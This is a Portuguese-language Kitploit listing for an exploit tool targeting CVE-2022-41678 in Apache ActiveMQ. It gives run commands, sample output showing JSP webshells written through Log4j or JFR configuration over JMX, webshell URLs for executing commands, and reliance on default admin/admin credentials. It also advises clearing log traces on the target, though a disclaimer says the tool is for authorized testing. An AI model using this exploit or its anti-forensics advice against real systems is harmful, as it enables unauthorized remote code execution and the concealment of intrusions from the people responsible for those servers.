Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-41678 — CVE-2022-41678 é uma vulnerabilidade de execução remota de código no Apache ActiveMQ. A vulnerabilidade permite que um atacante modifique a configuração do Log4j ou a configuração do JFR (Java Flight Recorder) através da interface JMX (Java Management Extensions), escrevendo um webshell JSP malicioso no diretório web do servidor, resultando em execução remota de código. | Kitploit
Ferramentas/GitHubGitHub/urjack2025/cve-2022-41678
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHuburjack2025/cve-2022-41678

CVE-2022-41678

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

2há 10 mesesAinda não revisado

CVE-2022-41678 é uma vulnerabilidade de execução remota de código no Apache ActiveMQ. A vulnerabilidade permite que um atacante modifique a configuração do Log4j ou a configuração do JFR (Java Flight Recorder) através da interface JMX (Java Management Extensions), escrevendo um webshell JSP malicioso no diretório web do servidor, resultando em execução remota de código.

Compartilhar

Apache ActiveMQ CVE-2022-41678 Ferramenta de Exploração de Vulnerabilidade

Visão Geral da Vulnerabilidade

Documento de referência: https://app.nextcyber.cn/courses/41/tasks/580

CVE-2022-41678 é uma vulnerabilidade de execução remota de código no Apache ActiveMQ. Esta vulnerabilidade permite que um invasor, através da interface JMX (Java Management Extensions), modifique a configuração do Log4j ou do JFR (Java Flight Recorder), escrevendo um webshell JSP malicioso no diretório web do servidor, resultando em execução remota de código.

Esta vulnerabilidade afeta várias versões do Apache ActiveMQ; as versões específicas afetadas dependem do uso das configurações Log4j e JFR.

Requisitos de Ambiente

  • Python 3.6 ou superior
  • Instale as dependências necessárias:
    root@kitploit:~
    pip install requests
    
  • O servidor ActiveMQ alvo precisa ter a interface JMX habilitada (geralmente acessível pelo caminho /api/jolokia/)
  • O invasor precisa saber o nome de usuário e senha do console do ActiveMQ (padrão geralmente admin/admin)

Modo de Uso

Uso Básico

Usando as credenciais padrão admin/admin e o método de exploração de detecção automática:

root@kitploit:~
python exp.py http://target:8161

Você também pode especificar nome de usuário e senha usando os parâmetros -u e -p:

root@kitploit:~
# 使用 Log4j
python exp.py -u admin -p admin http://10.22.174.214:8161

# 执行结果如下
python exp.py -u admin -p admin http://10.22.174.214:8161
2025-10-14 22:53:54,115 - INFO - choice MBean 'org.apache.logging.log4j2:type=5faeada1' automatically
2025-10-14 22:53:54,334 - INFO - update log config
2025-10-14 22:53:54,467 - INFO - write webshell to http://10.22.174.214:8161/admin/shell.jsp?cmd=id
2025-10-14 22:53:54,655 - INFO - restore log config

Além do método de exploração Log4j padrão, você também pode especificar o uso do método JFR com o parâmetro --exploit jfr.

root@kitploit:~
# 使用 JFR 方式
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161

# 执行结果如下
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161/
2025-10-14 23:16:35,978 - INFO - choice MBean jdk.management.jfr:type=FlightRecorder manually
2025-10-14 23:16:37,390 - INFO - create flight record, id = 1
2025-10-14 23:16:37,533 - INFO - update configuration for record 1
2025-10-14 23:16:38,167 - INFO - start record
2025-10-14 23:16:39,243 - INFO - stop record
2025-10-14 23:16:39,309 - INFO - write webshell to http://10.22.174.214:8161/admin/shelljfr.jsp?cmd=id

Verificando o Resultado da Exploração

Após a exploração bem-sucedida, você pode executar comandos acessando as seguintes URLs:

root@kitploit:~
# Log4j 方式写入的 webshell
http://target:8161/admin/shell.jsp?cmd=命令

# JFR 方式写入的 webshell
http://target:8161/admin/shelljfr.jsp?cmd=命令

Por exemplo, execute o comando id:

root@kitploit:~
http://target:8161/admin/shell.jsp?cmd=id

Descrição dos Parâmetros da Ferramenta

Notas

  1. Esta ferramenta é apenas para pesquisa de segurança e testes autorizados. Não use em sistemas não autorizados.
  2. Após a exploração bem-sucedida, a ferramenta tentará restaurar a configuração original do Log4j para minimizar o impacto no sistema alvo.
  3. Se o sistema alvo tiver restrições de acesso à rede, pode ser necessário ajustar as configurações de rede para garantir o acesso à interface JMX do alvo.
  4. Diferentes versões do ActiveMQ podem ter caminhos e configurações diferentes; pode ser necessário ajustar os caminhos na ferramenta de acordo com a situação real.
  5. A ferramenta opera usando a interface JMX; é necessário garantir que o ActiveMQ alvo tenha esta interface habilitada.
  6. A execução desta ferramenta pode deixar registros de log no sistema alvo; lembre-se de limpar os vestígios relevantes.
Baixar ferramenta
ParâmetroAbreviaçãoTipoValor PadrãoDescrição
--username-ustringadminNome de usuário do console ActiveMQ
--password-pstringadminSenha do console ActiveMQ
--exploit-estringautoMétodo de exploração, valores possíveis: auto, log4j, jfr
url-string-Endereço URL do ActiveMQ alvo (parâmetro obrigatório)